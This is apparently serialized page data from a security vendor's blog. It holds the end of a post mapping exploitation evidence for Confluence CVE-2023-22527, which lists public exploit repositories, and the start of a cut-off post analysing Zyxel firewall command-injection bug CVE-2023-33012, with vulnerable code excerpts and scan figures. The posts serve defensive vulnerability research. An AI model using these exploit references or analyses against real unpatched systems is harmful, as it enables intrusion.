741,28875],{"class":9152},[1373,77743,12998],{"class":9155},[1373,77745,183],{"class":9152},[1373,77747,4606],{"class":1383},[1373,77749,4883],{"class":9173},[1373,77751,77752],{"class":9176},"2024-01-17T10:21:00Z",[1373,77754,183],{"class":9173},[1373,77756,9062],{"class":1383},[1373,77758,77759,77761,77763,77765,77767,77769,77771,77773],{"class":1375,"line":7688},[1373,77760,28875],{"class":9152},[1373,77762,22394],{"class":9155},[1373,77764,183],{"class":9152},[1373,77766,4606],{"class":1383},[1373,77768,4883],{"class":9173},[1373,77770,1281],{"class":9176},[1373,77772,183],{"class":9173},[1373,77774,9062],{"class":1383},[1373,77776,77777,77779,77781,77783,77785,77787,77790],{"class":1375,"line":7709},[1373,77778,28875],{"class":9152},[1373,77780,22413],{"class":9155},[1373,77782,183],{"class":9152},[1373,77784,4606],{"class":1383},[1373,77786,4883],{"class":9173},[1373,77788,77789],{"class":9176},"git@github.com:ga0we1\u002FCVE-2023-22527_Confluence_RCE.git",[1373,77791,19057],{"class":9173},[1373,77793,77794],{"class":1375,"line":7714},[1373,77795,28912],{"class":1383},[1373,77797,77798],{"class":1375,"line":7722},[1373,77799,9788],{"class":1383},[1373,77801,77802,77804,77806,77808,77810,77812,77815,77817],{"class":1375,"line":9903},[1373,77803,28875],{"class":9152},[1373,77805,22335],{"class":9155},[1373,77807,183],{"class":9152},[1373,77809,4606],{"class":1383},[1373,77811,4883],{"class":9173},[1373,77813,77814],{"class":9176},"4530fd2e7aec",[1373,77816,183],{"class":9173},[1373,77818,9062],{"class":1383},[1373,77820,77821,77823,77825,77827,77829,77831,77834,77836],{"class":1375,"line":9908},[1373,77822,28875],{"class":9152},[1373,77824,22355],{"class":9155},[1373,77826,183],{"class":9152},[1373,77828,4606],{"class":1383},[1373,77830,4883],{"class":9173},[1373,77832,77833],{"class":9176},"https:\u002F\u002Fvulncheck.com\u002Fxdb\u002F4530fd2e7aec",[1373,77835,183],{"class":9173},[1373,77837,9062],{"class":1383},[1373,77839,77840,77842,77844,77846,77848,77850,77853,77855],{"class":1375,"line":9913},[1373,77841,28875],{"class":9152},[1373,77843,12998],{"class":9155},[1373,77845,183],{"class":9152},[1373,77847,4606],{"class":1383},[1373,77849,4883],{"class":9173},[1373,77851,77852],{"class":9176},"2024-01-24T04:44:59Z",[1373,77854,183],{"class":9173},[1373,77856,9062],{"class":1383},[1373,77858,77859,77861,77863,77865,77867,77869,77871,77873],{"class":1375,"line":9932},[1373,77860,28875],{"class":9152},[1373,77862,22394],{"class":9155},[1373,77864,183],{"class":9152},[1373,77866,4606],{"class":1383},[1373,77868,4883],{"class":9173},[1373,77870,1281],{"class":9176},[1373,77872,183],{"class":9173},[1373,77874,9062],{"class":1383},[1373,77876,77877,77879,77881,77883,77885,77887,77890],{"class":1375,"line":9937},[1373,77878,28875],{"class":9152},[1373,77880,22413],{"class":9155},[1373,77882,183],{"class":9152},[1373,77884,4606],{"class":1383},[1373,77886,4883],{"class":9173},[1373,77888,77889],{"class":9176},"git@github.com:yoryio\u002FCVE-2023-22527.git",[1373,77891,19057],{"class":9173},[1373,77893,77894],{"class":1375,"line":9957},[1373,77895,28912],{"class":1383},[1373,77897,77898],{"class":1375,"line":9962},[1373,77899,9788],{"class":1383},[1373,77901,77902,77904,77906,77908,77910,77912,77915,77917],{"class":1375,"line":15955},[1373,77903,28875],{"class":9152},[1373,77905,22335],{"class":9155},[1373,77907,183],{"class":9152},[1373,77909,4606],{"class":1383},[1373,77911,4883],{"class":9173},[1373,77913,77914],{"class":9176},"d6ff5abefc7e",[1373,77916,183],{"class":9173},[1373,77918,9062],{"class":1383},[1373,77920,77921,77923,77925,77927,77929,77931,77934,77936],{"class":1375,"line":16030},[1373,77922,28875],{"class":9152},[1373,77924,22355],{"class":9155},[1373,77926,183],{"class":9152},[1373,77928,4606],{"class":1383},[1373,77930,4883],{"class":9173},[1373,77932,77933],{"class":9176},"https:\u002F\u002Fvulncheck.com\u002Fxdb\u002Fd6ff5abefc7e",[1373,77935,183],{"class":9173},[1373,77937,9062],{"class":1383},[1373,77939,77940,77942,77944,77946,77948,77950,77953,77955],{"class":1375,"line":16035},[1373,77941,28875],{"class":9152},[1373,77943,12998],{"class":9155},[1373,77945,183],{"class":9152},[1373,77947,4606],{"class":1383},[1373,77949,4883],{"class":9173},[1373,77951,77952],{"class":9176},"2024-01-22T19:02:59Z",[1373,77954,183],{"class":9173},[1373,77956,9062],{"class":1383},[1373,77958,77959,77961,77963,77965,77967,77969,77971,77973],{"class":1375,"line":16083},[1373,77960,28875],{"class":9152},[1373,77962,22394],{"class":9155},[1373,77964,183],{"class":9152},[1373,77966,4606],{"class":1383},[1373,77968,4883],{"class":9173},[1373,77970,1281],{"class":9176},[1373,77972,183],{"class":9173},[1373,77974,9062],{"class":1383},[1373,77976,77977,77979,77981,77983,77985,77987,77990],{"class":1375,"line":16098},[1373,77978,28875],{"class":9152},[1373,77980,22413],{"class":9155},[1373,77982,183],{"class":9152},[1373,77984,4606],{"class":1383},[1373,77986,4883],{"class":9173},[1373,77988,77989],{"class":9176},"git@github.com:thanhlam-attt\u002FCVE-2023-22527.git",[1373,77991,19057],{"class":9173},[1373,77993,77994],{"class":1375,"line":16103},[1373,77995,28912],{"class":1383},[1373,77997,77998],{"class":1375,"line":16147},[1373,77999,9788],{"class":1383},[1373,78001,78002,78004,78006,78008,78010,78012,78015,78017],{"class":1375,"line":16153},[1373,78003,28875],{"class":9152},[1373,78005,22335],{"class":9155},[1373,78007,183],{"class":9152},[1373,78009,4606],{"class":1383},[1373,78011,4883],{"class":9173},[1373,78013,78014],{"class":9176},"30d9851d825e",[1373,78016,183],{"class":9173},[1373,78018,9062],{"class":1383},[1373,78020,78021,78023,78025,78027,78029,78031,78034,78036],{"class":1375,"line":16164},[1373,78022,28875],{"class":9152},[1373,78024,22355],{"class":9155},[1373,78026,183],{"class":9152},[1373,78028,4606],{"class":1383},[1373,78030,4883],{"class":9173},[1373,78032,78033],{"class":9176},"https:\u002F\u002Fvulncheck.com\u002Fxdb\u002F30d9851d825e",[1373,78035,183],{"class":9173},[1373,78037,9062],{"class":1383},[1373,78039,78040,78042,78044,78046,78048,78050,78053,78055],{"class":1375,"line":16170},[1373,78041,28875],{"class":9152},[1373,78043,12998],{"class":9155},[1373,78045,183],{"class":9152},[1373,78047,4606],{"class":1383},[1373,78049,4883],{"class":9173},[1373,78051,78052],{"class":9176},"2024-01-23T10:55:28Z",[1373,78054,183],{"class":9173},[1373,78056,9062],{"class":1383},[1373,78058,78059,78061,78063,78065,78067,78069,78071,78073],{"class":1375,"line":16187},[1373,78060,28875],{"class":9152},[1373,78062,22394],{"class":9155},[1373,78064,183],{"class":9152},[1373,78066,4606],{"class":1383},[1373,78068,4883],{"class":9173},[1373,78070,1281],{"class":9176},[1373,78072,183],{"class":9173},[1373,78074,9062],{"class":1383},[1373,78076,78077,78079,78081,78083,78085,78087,78090],{"class":1375,"line":16198},[1373,78078,28875],{"class":9152},[1373,78080,22413],{"class":9155},[1373,78082,183],{"class":9152},[1373,78084,4606],{"class":1383},[1373,78086,4883],{"class":9173},[1373,78088,78089],{"class":9176},"git@github.com:Chocapikk\u002FCVE-2023-22527.git",[1373,78091,19057],{"class":9173},[1373,78093,78094],{"class":1375,"line":16204},[1373,78095,28912],{"class":1383},[1373,78097,78098],{"class":1375,"line":16210},[1373,78099,9788],{"class":1383},[1373,78101,78102,78104,78106,78108,78110,78112,78115,78117],{"class":1375,"line":16254},[1373,78103,28875],{"class":9152},[1373,78105,22335],{"class":9155},[1373,78107,183],{"class":9152},[1373,78109,4606],{"class":1383},[1373,78111,4883],{"class":9173},[1373,78113,78114],{"class":9176},"4875746a557f",[1373,78116,183],{"class":9173},[1373,78118,9062],{"class":1383},[1373,78120,78121,78123,78125,78127,78129,78131,78134,78136],{"class":1375,"line":18499},[1373,78122,28875],{"class":9152},[1373,78124,22355],{"class":9155},[1373,78126,183],{"class":9152},[1373,78128,4606],{"class":1383},[1373,78130,4883],{"class":9173},[1373,78132,78133],{"class":9176},"https:\u002F\u002Fvulncheck.com\u002Fxdb\u002F4875746a557f",[1373,78135,183],{"class":9173},[1373,78137,9062],{"class":1383},[1373,78139,78140,78142,78144,78146,78148,78150,78153,78155],{"class":1375,"line":18504},[1373,78141,28875],{"class":9152},[1373,78143,12998],{"class":9155},[1373,78145,183],{"class":9152},[1373,78147,4606],{"class":1383},[1373,78149,4883],{"class":9173},[1373,78151,78152],{"class":9176},"2024-02-02T04:20:14Z",[1373,78154,183],{"class":9173},[1373,78156,9062],{"class":1383},[1373,78158,78159,78161,78163,78165,78167,78169,78171,78173],{"class":1375,"line":18517},[1373,78160,28875],{"class":9152},[1373,78162,22394],{"class":9155},[1373,78164,183],{"class":9152},[1373,78166,4606],{"class":1383},[1373,78168,4883],{"class":9173},[1373,78170,1281],{"class":9176},[1373,78172,183],{"class":9173},[1373,78174,9062],{"class":1383},[1373,78176,78177,78179,78181,78183,78185,78187,78190],{"class":1375,"line":18529},[1373,78178,28875],{"class":9152},[1373,78180,22413],{"class":9155},[1373,78182,183],{"class":9152},[1373,78184,4606],{"class":1383},[1373,78186,4883],{"class":9173},[1373,78188,78189],{"class":9176},"git@github.com:YongYe-Security\u002FCVE-2023-22527.git",[1373,78191,19057],{"class":9173},[1373,78193,78194],{"class":1375,"line":18541},[1373,78195,28912],{"class":1383},[1373,78197,78198],{"class":1375,"line":18562},[1373,78199,9788],{"class":1383},[1373,78201,78202,78204,78206,78208,78210,78212,78215,78217],{"class":1375,"line":18578},[1373,78203,28875],{"class":9152},[1373,78205,22335],{"class":9155},[1373,78207,183],{"class":9152},[1373,78209,4606],{"class":1383},[1373,78211,4883],{"class":9173},[1373,78213,78214],{"class":9176},"a3677d9bae7f",[1373,78216,183],{"class":9173},[1373,78218,9062],{"class":1383},[1373,78220,78221,78223,78225,78227,78229,78231,78234,78236],{"class":1375,"line":18583},[1373,78222,28875],{"class":9152},[1373,78224,22355],{"class":9155},[1373,78226,183],{"class":9152},[1373,78228,4606],{"class":1383},[1373,78230,4883],{"class":9173},[1373,78232,78233],{"class":9176},"https:\u002F\u002Fvulncheck.com\u002Fxdb\u002Fa3677d9bae7f",[1373,78235,183],{"class":9173},[1373,78237,9062],{"class":1383},[1373,78239,78240,78242,78244,78246,78248,78250,78253,78255],{"class":1375,"line":18600},[1373,78241,28875],{"class":9152},[1373,78243,12998],{"class":9155},[1373,78245,183],{"class":9152},[1373,78247,4606],{"class":1383},[1373,78249,4883],{"class":9173},[1373,78251,78252],{"class":9176},"2024-01-23T07:10:55Z",[1373,78254,183],{"class":9173},[1373,78256,9062],{"class":1383},[1373,78258,78259,78261,78263,78265,78267,78269,78271,78273],{"class":1375,"line":18605},[1373,78260,28875],{"class":9152},[1373,78262,22394],{"class":9155},[1373,78264,183],{"class":9152},[1373,78266,4606],{"class":1383},[1373,78268,4883],{"class":9173},[1373,78270,1281],{"class":9176},[1373,78272,183],{"class":9173},[1373,78274,9062],{"class":1383},[1373,78276,78277,78279,78281,78283,78285,78287,78290],{"class":1375,"line":18630},[1373,78278,28875],{"class":9152},[1373,78280,22413],{"class":9155},[1373,78282,183],{"class":9152},[1373,78284,4606],{"class":1383},[1373,78286,4883],{"class":9173},[1373,78288,78289],{"class":9176},"git@github.com:VNCERT-CC\u002FCVE-2023-22527-confluence.git",[1373,78291,19057],{"class":9173},[1373,78293,78294],{"class":1375,"line":18651},[1373,78295,9861],{"class":1383},[1373,78297,78298],{"class":1375,"line":18674},[1373,78299,77268],{"class":1383},[61,78301,78303],{"id":78302},"a-clearer-picture-into-known-exploited-vulnerabilities","A Clearer Picture Into Known Exploited Vulnerabilities",[18,78305,78306],{},"Having gathered this exploitation information, we can assemble the timeline into a clear visualization to better understand the publicly known exploitation evidence provided in VulnCheck KEV.",[18,78308,78309],{},[68,78310],{":width":10862,"alt":76706,"src":76707},[18,78312,78313],{},"This example underscores how early visibility into exploitation, along with references to exploits, offers timely insight into known exploitation—a key value of using VulnCheck KEV.",[18,78315,78316,78317,59],{},"Gain access to VulnCheck’s KEV catalog, which includes the data shown in this example for over 1,900 known exploited vulnerabilities, by registering for VulnCheck Community Edition ",[47,78318,305],{"href":78319,"rel":78320},"https:\u002F\u002Fvulncheck.com",[51],[61,78322,202],{"id":201},[18,78324,73676,78325,73680],{},[47,78326,216],{"href":214,"rel":78327},[51],[2901,78329,78330],{},"html pre.shiki code .siCPE, html code.shiki .siCPE{--shiki-light:#39ADB5;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sLACW, html code.shiki .sLACW{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .ss--_, html code.shiki .ss--_{--shiki-light:#90A4AE;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html .light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html.light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html .sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html.sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html pre.shiki code .swvn1, html code.shiki .swvn1{--shiki-light:#39ADB5;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .saDeg, html code.shiki .saDeg{--shiki-light:#39ADB5;--shiki-light-font-style:inherit;--shiki-default:#005CC5;--shiki-default-font-style:inherit;--shiki-dark:#79B8FF;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .sEff5, html code.shiki .sEff5{--shiki-light:#9C3EDA;--shiki-light-font-style:inherit;--shiki-default:#005CC5;--shiki-default-font-style:inherit;--shiki-dark:#79B8FF;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .sh1VR, html code.shiki .sh1VR{--shiki-light:#39ADB5;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#CFCFC2}html pre.shiki code .sINAO, html code.shiki .sINAO{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#CFCFC2}",{"title":219,"searchDepth":220,"depth":220,"links":78332},[78333,78334,78335,78336,78337,78338],{"id":76710,"depth":220,"text":76711},{"id":76720,"depth":220,"text":76721},{"id":76827,"depth":220,"text":76828},{"id":77271,"depth":220,"text":77272},{"id":78302,"depth":220,"text":78303},{"id":201,"depth":220,"text":202},"2024-02-27","Using VulnCheck KEV, we explore the anatomy of an exploited CVE. We map publicly available exploitation evidence to Atlassian Confluence CVE-2023-22527 to create a visual timeline of exploitation.",{"slug":78342},"the-anatomy-of-an-exploited-cve","\u002Fblog\u002Fthe-anatomy-of-an-exploited-cve",{"title":76696,"description":78340},"blog\u002Fthe-anatomy-of-an-exploited-cve",[],"cTS5gr-uOVhuSAQMBy_yINtvlLoJyv0ILckEdDC6k5U",{"id":78349,"title":58315,"articles":78350,"authors":78355,"body":78357,"date":79415,"description":79416,"extension":234,"image":7,"link":7,"meta":79417,"navigation":237,"path":79419,"seo":79420,"series":7,"stem":79421,"subtype":7,"tags":79422,"__hash__":79423},"blog\u002Fblog\u002Fzyxel-cve-2023-33012.md",[78351],{"title":78352,"source":61436,"link":78353,"date":78354},"Risky Biz News: Google addresses JIT security in Chrome 122","https:\u002F\u002Fnews.risky.biz\u002Frisky-biz-news-google-addresses-jit-security-in-chrome-122\u002F?ref=risky-business-news-newsletter","2024-02-23",[78356],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":78358,"toc":79407},[78359,78362,78364,78379,78403,78446,78461,78464,78469,78472,78550,78553,78558,78563,78566,78569,78572,78576,78579,78584,78591,78817,78830,78844,79029,79032,79037,79041,79044,79047,79051,79062,79065,79071,79194,79205,79211,79217,79223,79230,79236,79254,79260,79294,79303,79306,79324,79330,79341,79347,79350,79357,79374,79380,79383,79385,79388,79390,79404],[263,78360],{":list":78361,"ico":266,"title":58315},"[\"An unauthenticated command injection exploit affecting Zyxel firewalls was published in late January without an associated CVE. The vulnerability turns out to be CVE-2023-33012.\",\"The associated disclosure did not mention any caveats to exploitation, but it turns out only an uncommon configuration is affected. There are currently about 600 internet-facing Zyxel firewalls vulnerable to this issue (out of ~26,000).\",\"Unless the attacker takes specific measures, the exploit will only work on a target once.\",\"There is no evidence of exploitation in the wild.\"]",[61,78363,11648],{"id":11647},[18,78365,78366,78367,78372,78373,78378],{},"On January 25, 2024, SSD Secure Disclosure posted a disclosure titled ",[47,78368,78371],{"href":78369,"rel":78370},"https:\u002F\u002Fssd-disclosure.com\u002Fssd-advisory-zyxel-vpn-series-pre-auth-remote-command-execution\u002F",[51],"Zyxel VPN Series Pre-auth Remote Command Execution",". The writeup describes an unauthenticated remote command injection vulnerability affecting Zyxel VPN firewalls. That caught our attention. The Zyxel VPN series has appeared on the CISA KEV four times now, and the ",[47,78374,78377],{"href":78375,"rel":78376},"https:\u002F\u002Fweb.archive.org\u002Fweb\u002F20240204213745\u002Fhttps:\u002F\u002Fssd-disclosure.com\u002Fssd-advisory-zyxel-vpn-series-pre-auth-remote-command-execution\u002F",[51],"original"," disclosure didn’t mention a CVE. We were very interested in the implied inadvertent patching and wanted to figure out if the vulnerability had been exploited in the wild.",[18,78380,78381,78382,78387,78388,78392,78393,78398,78399,78402],{},"We quickly learned from Zyxel PSIRT that this was not inadvertently patched. They assigned ",[47,78383,78386],{"href":78384,"rel":78385},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2023-33012",[51],"CVE-2023-33012"," in an ",[47,78389,5359],{"href":78390,"rel":78391},"https:\u002F\u002Fwww.zyxel.com\u002Fglobal\u002Fen\u002Fsupport\u002Fsecurity-advisories\u002Fzyxel-security-advisory-for-multiple-vulnerabilities-in-firewalls-and-wlan-controllers",[51]," published in July 2023. The advisory credits ",[47,78394,78397],{"href":78395,"rel":78396},"https:\u002F\u002Ftrapa.tw\u002F",[51],"TRAPA Security"," for discovering the vulnerability and clarifies the issue ",[295,78400,78401],{},"is not"," isolated to VPN series. They listed the following affected models:",[307,78404,78405,78414],{},[310,78406,78407],{},[313,78408,78409,78411],{},[316,78410,3584],{},[316,78412,78413],{},"Affected Versions",[336,78415,78416,78424,78432,78439],{},[313,78417,78418,78421],{},[341,78419,78420],{},"ATP",[341,78422,78423],{},"V5.10 through V5.36 Patch 2",[313,78425,78426,78429],{},[341,78427,78428],{},"USG FLEX",[341,78430,78431],{},"V5.00 through V5.36 Patch 2",[313,78433,78434,78437],{},[341,78435,78436],{},"USG FLEX 50(W) \u002F USG20(W)-VPN",[341,78438,78423],{},[313,78440,78441,78444],{},[341,78442,78443],{},"VPN",[341,78445,78431],{},[18,78447,78448,78449,78454,78455,78460],{},"The affected models list is important because it demonstrates a significantly larger target set than SSD described. Shodan earmarks about ",[47,78450,78453],{"href":78451,"rel":78452},"https:\u002F\u002Fwww.shodan.io\u002Fsearch?query=title%3A%22VPN50%22%2C%22VPN100%22%2C%22VPN300%22%2C%22VPN1000%22+%2Bhtml%3A%22zyFunction.js%22+%2B%22Pragma%22",[51],"2,500"," internet-facing VPN series firewalls, but there are about ",[47,78456,78459],{"href":78457,"rel":78458},"https:\u002F\u002Fwww.shodan.io\u002Fsearch?query=title%3A%22USG+FLEX%22%2C%22ATP100%22%2C%22ATP100W%22%2C%22ATP200%22%2C%22ATP500%22%2C%22ATP700%22%2C%22ATP800%22%2C%22VPN50%22%2C%22VPN100%22%2C%22VPN300%22%2C%22VPN1000%22+%2Bhtml%3A%22zyFunction.js%22+%2B%22Pragma%22",[51],"26,000"," instances of all the models combined.",[18,78462,78463],{},"Zyxel also provided a much wider affected range. Really, SSD provides two conflicting ranges. They write:",[1925,78465,78466],{},[18,78467,78468],{},"The affected models are VPN50, VPN100, VPN300, VPN500, and VPN1000. The affected firmware version is 5.21 thru to 5.36.",[18,78470,78471],{},"But their proof of concept checks for versions greater than or equal to 5.10:",[1354,78473,78475],{"className":11719,"code":78474,"language":11721,"meta":219,"style":219},"if not title.startswith(\"VPN\") or version == \"\" or float(version) \u003C 5.10:\n print(\"[-] invulnerable target\")\n return\n",[886,78476,78477,78530,78545],{"__ignoreMap":219},[1373,78478,78479,78481,78484,78487,78489,78492,78494,78496,78498,78500,78502,78504,78507,78509,78511,78513,78516,78518,78521,78523,78525,78528],{"class":1375,"line":1376},[1373,78480,4637],{"class":4636},[1373,78482,78483],{"class":1397}," not",[1373,78485,78486],{"class":4640}," title",[1373,78488,59],{"class":1383},[1373,78490,78491],{"class":11735},"startswith",[1373,78493,1384],{"class":1383},[1373,78495,183],{"class":1387},[1373,78497,78443],{"class":1391},[1373,78499,183],{"class":1387},[1373,78501,2230],{"class":1383},[1373,78503,57252],{"class":1397},[1373,78505,78506],{"class":4640}," version ",[1373,78508,15920],{"class":1397},[1373,78510,16579],{"class":1387},[1373,78512,57252],{"class":1397},[1373,78514,78515],{"class":9165}," float",[1373,78517,1384],{"class":1383},[1373,78519,78520],{"class":11735},"version",[1373,78522,2230],{"class":1383},[1373,78524,27250],{"class":1397},[1373,78526,78527],{"class":5467}," 5.10",[1373,78529,11747],{"class":1383},[1373,78531,78532,78534,78536,78538,78541,78543],{"class":1375,"line":220},[1373,78533,63893],{"class":1379},[1373,78535,1384],{"class":1383},[1373,78537,183],{"class":1387},[1373,78539,78540],{"class":1391},"[-] invulnerable target",[1373,78542,183],{"class":1387},[1373,78544,11875],{"class":1383},[1373,78546,78547],{"class":1375,"line":1266},[1373,78548,78549],{"class":4636}," return\n",[18,78551,78552],{},"Assuming the Zyxel version range is correct, we scanned the internet for exposed Zyxel firewalls using the affected ranges. We found ~7,600 firewalls (or about 33% of the firewalls that responded to our version scan) using firmware versions that are affected by CVE-2023-33012.",[1925,78554,78555],{},[18,78556,78557],{},"Internet-Facing Zyxel Firewalls Using Versions Affected by CVE-2023-33012",[78559,78560],"pie-chart",{":labels":78561,":values":78562},"[\"Patched\",\"Unpatched\"]","[15190,7597]",[18,78564,78565],{},"For an offensive-minded individual, 7600 firewalls are still a decent target set, especially when a patch\u002Fadvisory had been published for six months. VulnCheck is full of offensive-minded individuals, and we just so happen to have a Zyxel USG FLEX in inventory (see previous statement about Zyxel firewalls in KEV). So, we started developing our own exploit.",[18,78567,78568],{},"But we swiftly ran into a wall.",[18,78570,78571],{},"SSD presents this vulnerability as a straightforward file upload and command injection. It is not. It both requires a special configuration and, unless the attacker knows what they are doing, can only work once.",[61,78573,78575],{"id":78574},"configuration-required","Configuration Required",[18,78577,78578],{},"The first hint that exploitation is not going to work right out of the box is from the CVE entry itself.",[1925,78580,78581],{},[18,78582,78583],{},"attacker to execute some OS commands by using a crafted GRE configuration when the cloud management mode is enabled.",[18,78585,78586,78587,78590],{},"Cloud Management Mode (SD-WAN mode) is not enabled by default. So, by default, Zyxel firewalls are not vulnerable to this issue. This can be easily verified using the vulnerable endpoint itself. The following is an edited (for brevity) version of ",[886,78588,78589],{},"\u002Fztp\u002Fcgi-bin\u002Fparse_config.py"," from USG FLEX 5.36.2:",[1354,78592,78594],{"className":11719,"code":78593,"language":11721,"meta":219,"style":219},"def main():\n form = cgi.FieldStorage()\n conf_str = form.getvalue(\"config\")\n \n print(\"Status: 200 OK\")\n print(\"Content-type: text\u002Fhtml\")\n print(\"\")\n \n if conf_str is None:\n conf_str = ''\n else:\n if not os.path.exists(ztpinclude.SERVER_SOCK_FILE):\n logging.error(\"Cannot find sdwan_interface socket [%s]!\" % ztpinclude.SERVER_SOCK_FILE)\n print(\"ParseError: 0xC0DE0005\")\n else:\n",[886,78595,78596,78606,78623,78648,78653,78669,78684,78694,78698,78711,78721,78728,78759,78794,78810],{"__ignoreMap":219},[1373,78597,78598,78601,78603],{"class":1375,"line":1376},[1373,78599,78600],{"class":7293},"def",[1373,78602,19186],{"class":7297},[1373,78604,78605],{"class":1383},"():\n",[1373,78607,78608,78611,78613,78616,78618,78621],{"class":1375,"line":220},[1373,78609,78610],{"class":4640}," form ",[1373,78612,5417],{"class":1397},[1373,78614,78615],{"class":4640}," cgi",[1373,78617,59],{"class":1383},[1373,78619,78620],{"class":11735},"FieldStorage",[1373,78622,27326],{"class":1383},[1373,78624,78625,78628,78630,78633,78635,78638,78640,78642,78644,78646],{"class":1375,"line":1266},[1373,78626,78627],{"class":4640}," conf_str ",[1373,78629,5417],{"class":1397},[1373,78631,78632],{"class":4640}," form",[1373,78634,59],{"class":1383},[1373,78636,78637],{"class":11735},"getvalue",[1373,78639,1384],{"class":1383},[1373,78641,183],{"class":1387},[1373,78643,38112],{"class":1391},[1373,78645,183],{"class":1387},[1373,78647,11875],{"class":1383},[1373,78649,78650],{"class":1375,"line":1852},[1373,78651,78652],{"class":4640}," \n",[1373,78654,78655,78658,78660,78662,78665,78667],{"class":1375,"line":4692},[1373,78656,78657],{"class":1379}," print",[1373,78659,1384],{"class":1383},[1373,78661,183],{"class":1387},[1373,78663,78664],{"class":1391},"Status: 200 OK",[1373,78666,183],{"class":1387},[1373,78668,11875],{"class":1383},[1373,78670,78671,78673,78675,78677,78680,78682],{"class":1375,"line":4724},[1373,78672,78657],{"class":1379},[1373,78674,1384],{"class":1383},[1373,78676,183],{"class":1387},[1373,78678,78679],{"class":1391},"Content-type: text\u002Fhtml",[1373,78681,183],{"class":1387},[1373,78683,11875],{"class":1383},[1373,78685,78686,78688,78690,78692],{"class":1375,"line":4756},[1373,78687,78657],{"class":1379},[1373,78689,1384],{"class":1383},[1373,78691,7083],{"class":1387},[1373,78693,11875],{"class":1383},[1373,78695,78696],{"class":1375,"line":4768},[1373,78697,78652],{"class":4640},[1373,78699,78700,78702,78704,78706,78709],{"class":1375,"line":4792},[1373,78701,7483],{"class":4636},[1373,78703,78627],{"class":4640},[1373,78705,5650],{"class":1397},[1373,78707,78708],{"class":7054}," None",[1373,78710,11747],{"class":1383},[1373,78712,78713,78716,78718],{"class":1375,"line":4798},[1373,78714,78715],{"class":4640}," conf_str ",[1373,78717,5417],{"class":1397},[1373,78719,78720],{"class":1387}," ''\n",[1373,78722,78723,78726],{"class":1375,"line":4806},[1373,78724,78725],{"class":4636}," else",[1373,78727,11747],{"class":1383},[1373,78729,78730,78733,78735,78737,78739,78741,78743,78746,78748,78751,78753,78756],{"class":1375,"line":4817},[1373,78731,78732],{"class":4636}," if",[1373,78734,78483],{"class":1397},[1373,78736,63565],{"class":4640},[1373,78738,59],{"class":1383},[1373,78740,7590],{"class":63570},[1373,78742,59],{"class":1383},[1373,78744,78745],{"class":11735},"exists",[1373,78747,1384],{"class":1383},[1373,78749,78750],{"class":11735},"ztpinclude",[1373,78752,59],{"class":1383},[1373,78754,78755],{"class":37971},"SERVER_SOCK_FILE",[1373,78757,78758],{"class":1383},"):\n",[1373,78760,78761,78764,78766,78768,78770,78772,78775,78777,78780,78782,78785,78788,78790,78792],{"class":1375,"line":4825},[1373,78762,78763],{"class":4640}," logging",[1373,78765,59],{"class":1383},[1373,78767,10265],{"class":11735},[1373,78769,1384],{"class":1383},[1373,78771,183],{"class":1387},[1373,78773,78774],{"class":1391},"Cannot find sdwan_interface socket [",[1373,78776,38048],{"class":5467},[1373,78778,78779],{"class":1391},"]!",[1373,78781,183],{"class":1387},[1373,78783,78784],{"class":1397}," %",[1373,78786,78787],{"class":11735}," ztpinclude",[1373,78789,59],{"class":1383},[1373,78791,78755],{"class":37971},[1373,78793,11875],{"class":1383},[1373,78795,78796,78799,78801,78803,78806,78808],{"class":1375,"line":4835},[1373,78797,78798],{"class":1379}," print",[1373,78800,1384],{"class":1383},[1373,78802,183],{"class":1387},[1373,78804,78805],{"class":1391},"ParseError: 0xC0DE0005",[1373,78807,183],{"class":1387},[1373,78809,11875],{"class":1383},[1373,78811,78812,78815],{"class":1375,"line":4843},[1373,78813,78814],{"class":4636}," else",[1373,78816,11747],{"class":1383},[18,78818,78819,78820,78823,78824,78826,78827,78829],{},"The important part is the check for ",[886,78821,78822],{},"ztpinclude.SERVER_SOCK_FILE",". If this file does not exist, the script sends the client the error code ",[886,78825,78805],{}," and then exits. This means it will never hit the vulnerable code path when that file doesn’t exist. ",[886,78828,78822],{}," only exists when cloud management mode is enabled.",[18,78831,78832,78833,78836,78837,78839,78840,78843],{},"That begs the question, ",[1131,78834,78835],{},"“How many Zyxell firewalls using 